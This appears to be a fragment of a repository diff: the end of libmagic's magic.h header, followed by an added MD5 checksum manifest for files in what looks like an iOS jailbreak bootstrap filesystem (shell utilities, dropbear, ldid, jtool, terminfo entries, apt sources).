* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR
|
||||
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
|
||||
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
|
||||
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
|
||||
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
|
||||
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
|
||||
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
|
||||
* SUCH DAMAGE.
|
||||
*/
|
||||
#ifndef _MAGIC_H
|
||||
#define _MAGIC_H
|
||||
|
||||
#include <sys/types.h>
|
||||
|
||||
#define MAGIC_NONE 0x0000000 /* No flags */
|
||||
#define MAGIC_DEBUG 0x0000001 /* Turn on debugging */
|
||||
#define MAGIC_SYMLINK 0x0000002 /* Follow symlinks */
|
||||
#define MAGIC_COMPRESS 0x0000004 /* Check inside compressed files */
|
||||
#define MAGIC_DEVICES 0x0000008 /* Look at the contents of devices */
|
||||
#define MAGIC_MIME_TYPE 0x0000010 /* Return the MIME type */
|
||||
#define MAGIC_CONTINUE 0x0000020 /* Return all matches */
|
||||
#define MAGIC_CHECK 0x0000040 /* Print warnings to stderr */
|
||||
#define MAGIC_PRESERVE_ATIME 0x0000080 /* Restore access time on exit */
|
||||
#define MAGIC_RAW 0x0000100 /* Don't convert unprintable chars */
|
||||
#define MAGIC_ERROR 0x0000200 /* Handle ENOENT etc as real errors */
|
||||
#define MAGIC_MIME_ENCODING 0x0000400 /* Return the MIME encoding */
|
||||
#define MAGIC_MIME (MAGIC_MIME_TYPE|MAGIC_MIME_ENCODING)
|
||||
#define MAGIC_APPLE 0x0000800 /* Return the Apple creator/type */
|
||||
#define MAGIC_EXTENSION 0x1000000 /* Return a /-separated list of
|
||||
* extensions */
|
||||
#define MAGIC_COMPRESS_TRANSP 0x2000000 /* Check inside compressed files
|
||||
* but not report compression */
|
||||
#define MAGIC_NODESC (MAGIC_EXTENSION|MAGIC_MIME|MAGIC_APPLE)
|
||||
|
||||
#define MAGIC_NO_CHECK_COMPRESS 0x0001000 /* Don't check for compressed files */
|
||||
#define MAGIC_NO_CHECK_TAR 0x0002000 /* Don't check for tar files */
|
||||
#define MAGIC_NO_CHECK_SOFT 0x0004000 /* Don't check magic entries */
|
||||
#define MAGIC_NO_CHECK_APPTYPE 0x0008000 /* Don't check application type */
|
||||
#define MAGIC_NO_CHECK_ELF 0x0010000 /* Don't check for elf details */
|
||||
#define MAGIC_NO_CHECK_TEXT 0x0020000 /* Don't check for text files */
|
||||
#define MAGIC_NO_CHECK_CDF 0x0040000 /* Don't check for cdf files */
|
||||
#define MAGIC_NO_CHECK_TOKENS 0x0100000 /* Don't check tokens */
|
||||
#define MAGIC_NO_CHECK_ENCODING 0x0200000 /* Don't check text encodings */
|
||||
#define MAGIC_NO_CHECK_JSON 0x0400000 /* Don't check for JSON files */
|
||||
|
||||
/* No built-in tests; only consult the magic file */
|
||||
#define MAGIC_NO_CHECK_BUILTIN ( \
|
||||
MAGIC_NO_CHECK_COMPRESS | \
|
||||
MAGIC_NO_CHECK_TAR | \
|
||||
/* MAGIC_NO_CHECK_SOFT | */ \
|
||||
MAGIC_NO_CHECK_APPTYPE | \
|
||||
MAGIC_NO_CHECK_ELF | \
|
||||
MAGIC_NO_CHECK_TEXT | \
|
||||
MAGIC_NO_CHECK_CDF | \
|
||||
MAGIC_NO_CHECK_TOKENS | \
|
||||
MAGIC_NO_CHECK_ENCODING | \
|
||||
MAGIC_NO_CHECK_JSON | \
|
||||
0 \
|
||||
)
|
||||
|
||||
#define MAGIC_SNPRINTB "\177\020\
|
||||
b\0debug\0\
|
||||
b\1symlink\0\
|
||||
b\2compress\0\
|
||||
b\3devices\0\
|
||||
b\4mime_type\0\
|
||||
b\5continue\0\
|
||||
b\6check\0\
|
||||
b\7preserve_atime\0\
|
||||
b\10raw\0\
|
||||
b\11error\0\
|
||||
b\12mime_encoding\0\
|
||||
b\13apple\0\
|
||||
b\14no_check_compress\0\
|
||||
b\15no_check_tar\0\
|
||||
b\16no_check_soft\0\
|
||||
b\17no_check_sapptype\0\
|
||||
b\20no_check_elf\0\
|
||||
b\21no_check_text\0\
|
||||
b\22no_check_cdf\0\
|
||||
b\23no_check_reserved0\0\
|
||||
b\24no_check_tokens\0\
|
||||
b\25no_check_encoding\0\
|
||||
b\26no_check_json\0\
|
||||
b\27no_check_reserved2\0\
|
||||
b\30extension\0\
|
||||
b\31transp_compression\0\
|
||||
"
|
||||
|
||||
/* Defined for backwards compatibility (renamed) */
|
||||
#define MAGIC_NO_CHECK_ASCII MAGIC_NO_CHECK_TEXT
|
||||
|
||||
/* Defined for backwards compatibility; do nothing */
|
||||
#define MAGIC_NO_CHECK_FORTRAN 0x000000 /* Don't check ascii/fortran */
|
||||
#define MAGIC_NO_CHECK_TROFF 0x000000 /* Don't check ascii/troff */
|
||||
|
||||
#define MAGIC_VERSION 535 /* This implementation */
|
||||
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
typedef struct magic_set *magic_t;
|
||||
magic_t magic_open(int);
|
||||
void magic_close(magic_t);
|
||||
|
||||
const char *magic_getpath(const char *, int);
|
||||
const char *magic_file(magic_t, const char *);
|
||||
const char *magic_descriptor(magic_t, int);
|
||||
const char *magic_buffer(magic_t, const void *, size_t);
|
||||
|
||||
const char *magic_error(magic_t);
|
||||
int magic_getflags(magic_t);
|
||||
int magic_setflags(magic_t, int);
|
||||
|
||||
int magic_version(void);
|
||||
int magic_load(magic_t, const char *);
|
||||
int magic_load_buffers(magic_t, void **, size_t *, size_t);
|
||||
|
||||
int magic_compile(magic_t, const char *);
|
||||
int magic_check(magic_t, const char *);
|
||||
int magic_list(magic_t, const char *);
|
||||
int magic_errno(magic_t);
|
||||
|
||||
#define MAGIC_PARAM_INDIR_MAX 0
|
||||
#define MAGIC_PARAM_NAME_MAX 1
|
||||
#define MAGIC_PARAM_ELF_PHNUM_MAX 2
|
||||
#define MAGIC_PARAM_ELF_SHNUM_MAX 3
|
||||
#define MAGIC_PARAM_ELF_NOTES_MAX 4
|
||||
#define MAGIC_PARAM_REGEX_MAX 5
|
||||
#define MAGIC_PARAM_BYTES_MAX 6
|
||||
|
||||
int magic_setparam(magic_t, int, const void *);
|
||||
int magic_getparam(magic_t, int, void *);
|
||||
|
||||
#ifdef __cplusplus
|
||||
};
|
||||
#endif
|
||||
|
||||
#endif /* _MAGIC_H */
|
||||
Binary file not shown.
@@ -0,0 +1,262 @@
|
||||
b898b8bcd8656374448051a69057521d ./usr/bin/tee
|
||||
2703abe4fb5a83025c1b9476ff76bd33 ./usr/bin/split
|
||||
b710863f5f7acf5212de2ae187a88036 ./usr/bin/vim
|
||||
924eba52787a353e3fc6238528bc8b57 ./usr/bin/hexdump
|
||||
50ba68b0d76faecb0ea94b70a59f299a ./usr/bin/nonceutil
|
||||
f03b02a469fe0f346e44db75a1fc47ef ./usr/bin/lsmp
|
||||
a0b9f9016ccade288455b7141e1a693a ./usr/bin/vm_stat
|
||||
7a503e87e55cee7427f94c5046f602d8 ./usr/bin/syslog
|
||||
dd692a7b33f7478497f8c1b68755c477 ./usr/bin/du
|
||||
636437c879c120f204305669342a8294 ./usr/bin/fs_usage
|
||||
5eab0aa90c966a26d7f2d912bcd19e74 ./usr/bin/renice
|
||||
7a747035cf06761640e2bd1121a9fed7 ./usr/bin/xxd
|
||||
33785345f40bdad328c2a79f013e91e8 ./usr/bin/sc_usage
|
||||
58041d4cc703a25dc41d5b5e49994da3 ./usr/bin/less
|
||||
9c3b5ece12be439690b6f0a021dde9e3 ./usr/bin/inject
|
||||
65cf7456fbf76bdb3fffadf765c3e54a ./usr/bin/sed
|
||||
8f4cfcd2a709e88b88504b82ff358d65 ./usr/bin/nano
|
||||
07d32b3046248014cfaa0e1f3a489bdb ./usr/bin/tset
|
||||
63e15286116be714262cb697a7517128 ./usr/bin/seq
|
||||
e65a3eeaeea8336154f8c7f9c5bf0018 ./usr/bin/uname
|
||||
e4e05c7bf0831c52dd409dbe0d2f660e ./usr/bin/uicache
|
||||
b902b099b0b3f067165fe0baef133a69 ./usr/bin/reset
|
||||
4f01671c0ae2083b07d1ecdea264964b ./usr/bin/wc
|
||||
fd17aa563a90ced7ef7d2342aec7e280 ./usr/bin/gzip
|
||||
f89a4d1a23bc10e6e10c8f1b1bcaa652 ./usr/bin/ldid3
|
||||
2629d71e6c09495a482270544c60b5a5 ./usr/bin/printf
|
||||
c653ea9550bad9b55c97d3b1e90b8f69 ./usr/bin/ldid2
|
||||
42c0b3b435c28cec0a707dc9802cfed7 ./usr/bin/tail
|
||||
b86021f1c7316b66acd50abfedd594c2 ./usr/bin/grep
|
||||
e92491131960f0005f3f7ca416ee9236 ./usr/bin/script
|
||||
9efbb27fe365cddcb005578bd7ef7a65 ./usr/bin/more
|
||||
2fee7eacb33519aa2996cc2b83a6d357 ./usr/bin/time
|
||||
39c15e53f0dd82a58012d1d0181905e1 ./usr/bin/plconvert
|
||||
8eb822233be91c75570479c3073a5b3d ./usr/bin/head
|
||||
3bf9386f7d05055686a188718b6c12c2 ./usr/bin/clear
|
||||
f8778ec9c9faa44538b0c318624035c3 ./usr/bin/killall
|
||||
6610423671919d8e6f8588146711bd13 ./usr/bin/stat
|
||||
9f6d23b3158fd3f8a0fb900beabaa5f1 ./usr/bin/snappy
|
||||
a806f7b0dc5c4fd3d8e002afa16fadc3 ./usr/bin/sqlite3
|
||||
cdb0f23de81daad4e560ebd59c8de355 ./usr/bin/screen
|
||||
07a9b81c90872a25766127a840a14da6 ./usr/bin/arch
|
||||
50b64b8b88be46ef32d56f081542aa8c ./usr/bin/cut
|
||||
0a740c42b89808c236a07a51fe5a814d ./usr/bin/xargs
|
||||
4433ef936563f2838b09305737851015 ./usr/bin/what
|
||||
7786eabe3fe5b6b4180ced0cf4602502 ./usr/bin/ldid
|
||||
c41791441994916f3346f2f669f7bca2 ./usr/bin/chflags
|
||||
a97084e55faa35ff653099171312bb9b ./usr/bin/id
|
||||
80b33297033bd59ae090ebba1ec9b67a ./usr/bin/find
|
||||
5e84a2de4d32118d6c4adcb2e897f801 ./usr/bin/scp
|
||||
65fa4d06e93e3f9239ec284a8cafc279 ./usr/bin/true
|
||||
c32656a75f5e24d003683d8af58ca6d1 ./usr/bin/hostinfo
|
||||
b0bc120ffd09ddc8bc288556e4e238f4 ./usr/bin/tar
|
||||
d272b6b9ee40350bc868786ab6863024 ./usr/bin/false
|
||||
202fe8e6692a3a180cf0d92a16275dfc ./usr/bin/login
|
||||
d2d12e8f4cfae79936803eaa78a6c2e9 ./usr/bin/which
|
||||
a098a6ea3245b6e32b2d6085bf88f46a ./usr/bin/passwd
|
||||
23390a4a27a63ae1026e0d4640e74e97 ./usr/bin/nohup
|
||||
c9655b6dd73a182160636015270fb315 ./usr/bin/w
|
||||
110eecf0ee42142c045065003de6da8d ./usr/bin/gunzip
|
||||
3444747dd9c4f6a5207af74622318d1f ./usr/sbin/joreg
|
||||
9277c487d0a37255dba1dc8edbb14646 ./usr/sbin/ioreg
|
||||
5e0ea2ba00edd93b93c489fff5cf673e ./usr/sbin/sysctl
|
||||
a946312719036084be1584f559b2ad93 ./usr/sbin/taskpolicy
|
||||
d96c5cae510321ceb1de66a8e8a2bc47 ./usr/sbin/netstat
|
||||
ade27f5ac9bd41b1f6966829a8ae320f ./usr/sbin/ltop
|
||||
5786e43b57cc62e23931b319b91a8085 ./usr/sbin/chown
|
||||
bfe6c05f61efb46bcd4af932a504e6e6 ./usr/sbin/kextstat
|
||||
2d407928f102245200b62813aa33be3a ./usr/local/bin/wget
|
||||
70daec5f62c7801f4494df325a53c441 ./usr/local/bin/jtool2
|
||||
b95d60ad4d5812bae3eddd7c28647063 ./usr/local/bin/dbclient
|
||||
ded12835bcef335967e2165d6b0e744a ./usr/local/bin/filemon
|
||||
82b62dd019b9f24c9e7cd6a6c2140084 ./usr/local/bin/dropbear
|
||||
9886346e798d3fd0ca2535f599bffa0e ./usr/local/bin/procexp
|
||||
70da97361f47e94787937494e8653e77 ./usr/local/bin/jtool
|
||||
1eb37e4f8d302d259fb8d7b16985acfb ./usr/local/bin/dropbearkey
|
||||
4f3fb0098020807cdd741f51dd1663b3 ./usr/local/bin/jlutil
|
||||
94143bce6a7b0279a2db88ce2c3e3fdb ./usr/local/bin/joker
|
||||
bfa7e6f6b1c4f2044457101a6bc319c8 ./usr/local/bin/dropbearconvert
|
||||
a115f8ee5627857f5da055a1a8e9056c ./usr/local/bin/dropbear.orig
|
||||
d09a8eba7adbcf9417c48ed83928753b ./usr/local/bin/procexp.ent
|
||||
44298a30dfedbb312ba3923716aa61a0 ./usr/local/lib/zsh/5.0.8/zsh/termcap.so
|
||||
d0b05ff80a5f5470a77740714735c573 ./usr/local/lib/zsh/5.0.8/zsh/zleparameter.so
|
||||
d8c7842dca4e2b405ce8ab605aa78594 ./usr/local/lib/zsh/5.0.8/zsh/example.so
|
||||
73ae237bf2dafc21cef52e3b04bcd90d ./usr/local/lib/zsh/5.0.8/zsh/tcp.so
|
||||
23586b85e7444fe401672bdca5585e64 ./usr/local/lib/zsh/5.0.8/zsh/newuser.so
|
||||
705963ad326169b2b1a3a517b05765d7 ./usr/local/lib/zsh/5.0.8/zsh/deltochar.so
|
||||
714cfac68394abc786f32e96056a98a6 ./usr/local/lib/zsh/5.0.8/zsh/complete.so
|
||||
f25da108adc8701d153c9da648735307 ./usr/local/lib/zsh/5.0.8/zsh/mapfile.so
|
||||
65c97546fd24f08f90f4b49ce8632c64 ./usr/local/lib/zsh/5.0.8/zsh/stat.so
|
||||
b66cfb813e273d2ea24f585a9d07e2e0 ./usr/local/lib/zsh/5.0.8/zsh/compctl.so
|
||||
da02e032689685300c6c8a760d119066 ./usr/local/lib/zsh/5.0.8/zsh/zselect.so
|
||||
fc34fea197cfac379678b83ccaff6a1b ./usr/local/lib/zsh/5.0.8/zsh/parameter.so
|
||||
63231fa531348d09c55eff734e306e18 ./usr/local/lib/zsh/5.0.8/zsh/datetime.so
|
||||
f91108fc9fb83cc2138f9d1da7487b29 ./usr/local/lib/zsh/5.0.8/zsh/socket.so
|
||||
91f38fd37f10e3f35dbcbb49b8adfb0a ./usr/local/lib/zsh/5.0.8/zsh/terminfo.so
|
||||
deb70a41a405bb0824436ad028c556b6 ./usr/local/lib/zsh/5.0.8/zsh/clone.so
|
||||
9d3559e577bfca109520e4f0bad491ba ./usr/local/lib/zsh/5.0.8/zsh/regex.so
|
||||
f12d65d38fbe3c1db7b7d65d13a25e0c ./usr/local/lib/zsh/5.0.8/zsh/attr.so
|
||||
d16c5f028e26d507cdb8af9f165f14f8 ./usr/local/lib/zsh/5.0.8/zsh/curses.so
|
||||
91f32f5cb48390222c22ed8028e55d90 ./usr/local/lib/zsh/5.0.8/zsh/files.so
|
||||
eaf924f4282275441520d82567069883 ./usr/local/lib/zsh/5.0.8/zsh/system.so
|
||||
24a2ba2b1826a6e8990b04d9bc43e316 ./usr/local/lib/zsh/5.0.8/zsh/zpty.so
|
||||
23cc2ecf2e19f32f8eb6f9d7a37e1706 ./usr/local/lib/zsh/5.0.8/zsh/zle.so
|
||||
4d094b2b38db4fd73ae574befb25204e ./usr/local/lib/zsh/5.0.8/zsh/mathfunc.so
|
||||
bec6c7e86f26a77b9524ed128da4b4d9 ./usr/local/lib/zsh/5.0.8/zsh/zutil.so
|
||||
2ae606823ae7e68d3af3bb351a19b437 ./usr/local/lib/zsh/5.0.8/zsh/complist.so
|
||||
c6a1d10d2211feb80284e81186caa6be ./usr/local/lib/zsh/5.0.8/zsh/zftp.so
|
||||
7f3430e22eb6b38aa117ee4ed9352cee ./usr/local/lib/zsh/5.0.8/zsh/cap.so
|
||||
b513edef71f83a0254ee3f78539a1240 ./usr/local/lib/zsh/5.0.8/zsh/computil.so
|
||||
fdba1d6dda089229cdaa4a10f621b703 ./usr/local/lib/zsh/5.0.8/zsh/zprof.so
|
||||
68fc31400366cc71bf7f7e2177ea6368 ./usr/local/lib/zsh/5.0.8/zsh/langinfo.so
|
||||
fa2279010eb25eb9658280d4e8741a4c ./usr/share/terminfo/61/ansi80x50-mono
|
||||
c835906031322f6793d0bba8a4024cf4 ./usr/share/terminfo/61/ansi+idl1
|
||||
3b55b40fd24d7095314b9c3571aac6fb ./usr/share/terminfo/61/ansil
|
||||
68354f5acab5acd36a028df8ef111944 ./usr/share/terminfo/61/ansi+idc
|
||||
3ae2c75389debb39daa93a37d0a05592 ./usr/share/terminfo/61/ansiw
|
||||
4ef30ab8d7c15a62823e5f4264f6d62d ./usr/share/terminfo/61/ansi80x30
|
||||
0929a9ac82bd6cb0238dfb7577b8240f ./usr/share/terminfo/61/ansi-mono
|
||||
12c43baa349979c093c1743a7489d8ee ./usr/share/terminfo/61/ansi+pp
|
||||
41573351ca6e86546bd1a58cdbf5cd62 ./usr/share/terminfo/61/ansi+idl
|
||||
fa2279010eb25eb9658280d4e8741a4c ./usr/share/terminfo/61/ansil-mono
|
||||
586b7d053f8a935202bc95bd769ee4f3 ./usr/share/terminfo/61/ansi80x30-mono
|
||||
3ae2c75389debb39daa93a37d0a05592 ./usr/share/terminfo/61/ansi80x25-raw
|
||||
71a5dd341d754460eb189f73779feb41 ./usr/share/terminfo/61/ansi+csr
|
||||
30ef341210e5227e41eaff5b83fac717 ./usr/share/terminfo/61/ansi-generic
|
||||
cf35f34c8755efb774005f800afab654 ./usr/share/terminfo/61/ansi+sgr
|
||||
6e327b6172dd4886024fd780797da60a ./usr/share/terminfo/61/ansi+cup
|
||||
a811d944eb78b2a1f97aa6578dca08fa ./usr/share/terminfo/61/ansi-emx
|
||||
017e3893644413c3d4446ac47c93951f ./usr/share/terminfo/61/ansi+sgrbold
|
||||
0afdcc1032306d8d3ea05def04340d21 ./usr/share/terminfo/61/ansi+sgrul
|
||||
418c636af2942a1462885a6b667825a7 ./usr/share/terminfo/61/ansi80x60-mono
|
||||
5ab0fa91be25a2e1005fcd94dc9dd469 ./usr/share/terminfo/61/ansi+sgrso
|
||||
6b3a86ff2f1b95acfdd820fbf8750b01 ./usr/share/terminfo/61/ansi
|
||||
f18d72643477964bafbb499a518afab3 ./usr/share/terminfo/61/ansi-color-2-emx
|
||||
5cc9c4e94f47197a1171e8841c0909a6 ./usr/share/terminfo/61/ansis-mono
|
||||
bd5a24c27f2aae15e7c8616478b35177 ./usr/share/terminfo/61/ansi-color-3-emx
|
||||
47a77469940121acd86a1b82db198f3b ./usr/share/terminfo/61/ansisysk
|
||||
6871af613871edf164a0656f20dc2c8c ./usr/share/terminfo/61/ansi43m
|
||||
042f8da76683abcdace3439800571223 ./usr/share/terminfo/61/ansi-mtabs
|
||||
33b216e8fec086dbe4c884aa7b566d5b ./usr/share/terminfo/61/ansi+sgrdim
|
||||
5eb691998583e67c1d1d66f6d1b065ba ./usr/share/terminfo/61/ansi80x25
|
||||
38ad8b0dad6aab8bd2016f70a99cd5b0 ./usr/share/terminfo/61/ansi+erase
|
||||
aa05b8d0aa5e705fa2ad93378fd63f6e ./usr/share/terminfo/61/ansi+rep
|
||||
5eb691998583e67c1d1d66f6d1b065ba ./usr/share/terminfo/61/ansis
|
||||
3b55b40fd24d7095314b9c3571aac6fb ./usr/share/terminfo/61/ansi80x50
|
||||
7183c55fa5ac8798a7dc32930ac058f5 ./usr/share/terminfo/61/ansi+tabs
|
||||
943d1287db33a09d31ba2ec571047807 ./usr/share/terminfo/61/ansi+local1
|
||||
c54fc1fd467518dae352dd8de6fade98 ./usr/share/terminfo/61/ansi80x60
|
||||
54f926c6f19b6d1f02ced3ec7dcc7d2d ./usr/share/terminfo/61/ansi+rca
|
||||
c12e955efc5c4f813357a89fd90a84b3 ./usr/share/terminfo/61/ansi-mini
|
||||
908b80b219e9ae677f65aac5814a8aba ./usr/share/terminfo/61/ansi+enq
|
||||
5b2a31e020e45acef8b3154423e36061 ./usr/share/terminfo/61/ansi-nt
|
||||
7a494b98caadb3132504382fe6ccd1e3 ./usr/share/terminfo/61/ansi77
|
||||
d59ad3dfe0d905f83febae83bbb6490d ./usr/share/terminfo/61/ansi-mr
|
||||
c5195124980c2d8c2be86cbfa4c29390 ./usr/share/terminfo/61/ansi80x43-mono
|
||||
fccc68bc07c0961e088e0b327d585008 ./usr/share/terminfo/61/ansi.sys
|
||||
3f95bb59083f6458ee20714be2455c24 ./usr/share/terminfo/61/ansi.sys-old
|
||||
47a77469940121acd86a1b82db198f3b ./usr/share/terminfo/61/ansi.sysk
|
||||
5cc9c4e94f47197a1171e8841c0909a6 ./usr/share/terminfo/61/ansi80x25-mono
|
||||
34b77e5af5db12946a3720cb7c72fbbc ./usr/share/terminfo/61/ansi+inittabs
|
||||
fe8ccd619fa36730e1989be8bf64a880 ./usr/share/terminfo/61/ansi+local
|
||||
0929a9ac82bd6cb0238dfb7577b8240f ./usr/share/terminfo/61/ansi-m
|
||||
e0a527902af2067e4b2d7233098a9544 ./usr/share/terminfo/61/ansi80x43
|
||||
acc9f736d0109a103776546ff99d4448 ./usr/share/terminfo/61/ansi+arrows
|
||||
758da19fa1ad8fa0aa8872d2fa4fabc2 ./usr/share/terminfo/73/screen-16color
|
||||
71191244af59a0bc0eff3cb7e5c6761a ./usr/share/terminfo/73/screen2
|
||||
779220648133f21501a25a1d7f736ede ./usr/share/terminfo/73/screen3
|
||||
6e536f3f0ca81e760cca30af42ef5ee5 ./usr/share/terminfo/73/screen-16color-bce-s
|
||||
acdec11a201772f9868008c9b35370a4 ./usr/share/terminfo/73/screen-256color-bce
|
||||
451f167847fa67389cf5d57ce1407e43 ./usr/share/terminfo/73/screen.rxvt
|
||||
24337a754ffdf33baa8f7833fec84a17 ./usr/share/terminfo/73/screen.xterm-r6
|
||||
2fdd2ae242a69fc6a6846adbad436bfb ./usr/share/terminfo/73/screen-w
|
||||
1fc43105421912a088b1d94675f7fd05 ./usr/share/terminfo/73/screen.xterm-xfree86
|
||||
4209d2ad407722c4ee0d38679569633f ./usr/share/terminfo/73/screen-16color-s
|
||||
6f004c8e3d5856b5522c8cecbc668ecd ./usr/share/terminfo/73/screen.linux
|
||||
ac3ad0fb0869538166f5a12fbcfe0c21 ./usr/share/terminfo/73/screen-256color-bce-s
|
||||
206907aeaa38189a8b2e74feae020f91 ./usr/share/terminfo/73/screen
|
||||
1e076f070f12f1039f827e518717c5e0 ./usr/share/terminfo/73/screen-bce
|
||||
40e690ba777f5df6351949d569a0c419 ./usr/share/terminfo/73/screen-256color-s
|
||||
3b4151a6763a7d1439e8b1709325f123 ./usr/share/terminfo/73/screen.mlterm
|
||||
6db29fffc6c61f7ce0052805f9d997d9 ./usr/share/terminfo/73/screen-s
|
||||
06d68826ae2b44388d31bbf15bfc3ebf ./usr/share/terminfo/73/screen.teraterm
|
||||
bc62056fcb4a9609cb0ce74bbf3fa5e8 ./usr/share/terminfo/73/screen-16color-bce
|
||||
1fc43105421912a088b1d94675f7fd05 ./usr/share/terminfo/73/screen.xterm-new
|
||||
ffb01624d78c3593c3a5c34624186a7d ./usr/share/terminfo/73/screen-256color
|
||||
19c69a8a937560ae5f5f88b0fe6773a6 ./usr/share/terminfo/73/screen+fkeys
|
||||
6571655c5c8e2cdd82754860b0f12cf9 ./usr/share/terminfo/6c/linux-lat
|
||||
0a3b98f41dbaa4ec10b6b33e1f7e5fb8 ./usr/share/terminfo/6c/linux-koi8r
|
||||
53ab5f398fdf2fc9a04e3d443439c748 ./usr/share/terminfo/6c/linux-vt
|
||||
c908ab61179176e87feeffea61d48550 ./usr/share/terminfo/6c/linux-basic
|
||||
645999d4afb490d40ff6b55239ad8173 ./usr/share/terminfo/6c/linux
|
||||
3497148074bf923fb5947f332143b4dc ./usr/share/terminfo/6c/linux-c-nc
|
||||
5f6c4c2e8b8176b5a75551a123d6a5c7 ./usr/share/terminfo/6c/linux2.6.26
|
||||
d430677ee48aaa29b1ec07856fadf1b3 ./usr/share/terminfo/6c/linux-c
|
||||
859f454b42150769255dcb99d7715769 ./usr/share/terminfo/6c/linux-m
|
||||
ef9a25f74c562344cc9840830df27ce9 ./usr/share/terminfo/6c/linux-nic
|
||||
1e2899cc9d0dbb7e97adc7c6117e296c ./usr/share/terminfo/6c/linux-koi8
|
||||
a06a3fcbf8aebe420717a1933eb21572 ./usr/share/terminfo/76/vt100-putty
|
||||
5ab1f7397095f804dcb33dd95358ff71 ./usr/share/terminfo/76/vt100-nav-w
|
||||
4aaaf3867c2dd1faef92e6519d38e26e ./usr/share/terminfo/76/vt100-s
|
||||
2cfff02a7d0fe4d1ae27b0127b9a7716 ./usr/share/terminfo/76/vt100+
|
||||
e49122999d1ba9ccbe2f7f56d706e897 ./usr/share/terminfo/76/vt100nam
|
||||
5619ee07eba86463eb529b11fa45b7a5 ./usr/share/terminfo/76/vt100-vb
|
||||
1da2593594b479b4ad1191724b755981 ./usr/share/terminfo/76/vt100+enq
|
||||
4aaaf3867c2dd1faef92e6519d38e26e ./usr/share/terminfo/76/vt100-s-top
|
||||
f99eba18048c6edefef69b2aa6cf9671 ./usr/share/terminfo/76/vt100-nam-w
|
||||
3d6df1ce9053ede73fe26bbb393a2da4 ./usr/share/terminfo/76/vt100+fnkeys
|
||||
25cbb52e83f147f21489d20addde7cd1 ./usr/share/terminfo/76/vt100-w
|
||||
96300e9c1b0dea5f61383f5d22342ef3 ./usr/share/terminfo/76/vt100
|
||||
5ab1f7397095f804dcb33dd95358ff71 ./usr/share/terminfo/76/vt100-w-nav
|
||||
846029909338b3ee934e3cc1de3f3c0e ./usr/share/terminfo/76/vt100-bot-s
|
||||
f99eba18048c6edefef69b2aa6cf9671 ./usr/share/terminfo/76/vt100-w-nam
|
||||
8fe8280e41916a873a0235c91308ebd2 ./usr/share/terminfo/76/vt100+pfkeys
|
||||
4aaaf3867c2dd1faef92e6519d38e26e ./usr/share/terminfo/76/vt100-top-s
|
||||
76baa3a9460d6112ac20dbf6f58725c2 ./usr/share/terminfo/76/vt100-nav
|
||||
e49122999d1ba9ccbe2f7f56d706e897 ./usr/share/terminfo/76/vt100-nam
|
||||
1fff1e9d64dd710f90c6008da71cd0a3 ./usr/share/terminfo/76/vt100-bm-o
|
||||
9093d267d0a3b5b7edc3008c6403d47b ./usr/share/terminfo/76/vt100+keypad
|
||||
96300e9c1b0dea5f61383f5d22342ef3 ./usr/share/terminfo/76/vt100-am
|
||||
846029909338b3ee934e3cc1de3f3c0e ./usr/share/terminfo/76/vt100-s-bot
|
||||
25cbb52e83f147f21489d20addde7cd1 ./usr/share/terminfo/76/vt100-w-am
|
||||
846bea1b765ff91b190735acc298a355 ./usr/share/terminfo/76/vt100-bm
|
||||
0ba872cd880784a95b7af42a83c48949 ./usr/share/terminfo/78/xterm-256color
|
||||
29fb028ed95c62344e4c7481dcd29073 ./bin/cat
|
||||
6fc19a7da30a530781ee4273f2a522e9 ./bin/launchctl
|
||||
466ef7ee8a34ba8440e3acb80fa71c87 ./bin/pwd
|
||||
b341e08776130c4bbeacb3c5440a3c8a ./bin/sleep
|
||||
eef9a9be2cbabea493244700f9ae1a74 ./bin/stty
|
||||
49022225d7e96a902373075d65aec180 ./bin/date
|
||||
c88dae390cc7a36d809c47d1ebc3eb8b ./bin/bash
|
||||
07c13bc01719fade1c0de1a58e724054 ./bin/kill
|
||||
370429cf74f838ef835d2f6c0d3fa372 ./bin/sh
|
||||
917a48c4bfbf425642bc6bb211b471c8 ./bin/dd
|
||||
77478fa33e34293ec64b06520e4c177b ./bin/mkdir
|
||||
1db90ee85858bfe24c3e48ee79fc6a8f ./bin/hostname
|
||||
1af430cf9a416718a833dc7d56b83d3f ./bin/rmdir
|
||||
d7b48f7b1b6079c15ca03433aa491b80 ./bin/mv
|
||||
36d7da72f9f403da7f93d05a730e34dc ./bin/ln
|
||||
ab5a603e1b9767b4bdbc7bbe0d1c73ab ./bin/ls
|
||||
073a21568d2972f660a50a6285382e22 ./bin/cp
|
||||
960e843cbea307bbfbfbe03cf0ba6dc7 ./bin/sync
|
||||
1bcc4fc32919686b78d57ddc7c52bd9b ./bin/zsh
|
||||
cef478d4cc0ecf6e79cd66ef6637c326 ./bin/chmod
|
||||
4f5505d33d87c4a7ff02193201259efe ./bin/rm
|
||||
be57e6ecb88b09d17bade80754ac9090 ./sbin/md5
|
||||
d55d1d2b3bb292f0a0bb336fe9207b8e ./sbin/ping
|
||||
80d22f83f5a5910c514548dab882ab88 ./sbin/shutdown
|
||||
fd71b7e59272201dd1224423907f6d19 ./sbin/ifconfig
|
||||
7654ea8f99b18c262cd3eb77147640dd ./sbin/umount
|
||||
50a03c50fd14f9ec62f5354ff65b2a8c ./sbin/kextunload
|
||||
139ce2d3be19697053781879d36e932e ./sbin/mknod
|
||||
4945de2c730d66ee21d0ab14990c026f ./sbin/dmesg
|
||||
1a2802c58d678f6e8f8f8b2027c97c63 ./etc/zshrc
|
||||
fe116dfdd0905b1d881cdb27799332d3 ./etc/profile
|
||||
d41d8cd98f00b204e9800998ecf8427e ./etc/apt/sources.list.d/cydia.list
|
||||
ac0e7ddf2acd61e6c54b37f9fafc1253 ./etc/apt/sources.list.d/saurik.list
|
||||
7c47a6c3258b47b256f601d65c6dae3d ./etc/apt/trusted.gpg.d/zodttd.gpg
|
||||
4f56a1d2f4b62780e13bc494dd0eb8e6 ./etc/apt/trusted.gpg.d/bigboss.gpg
|
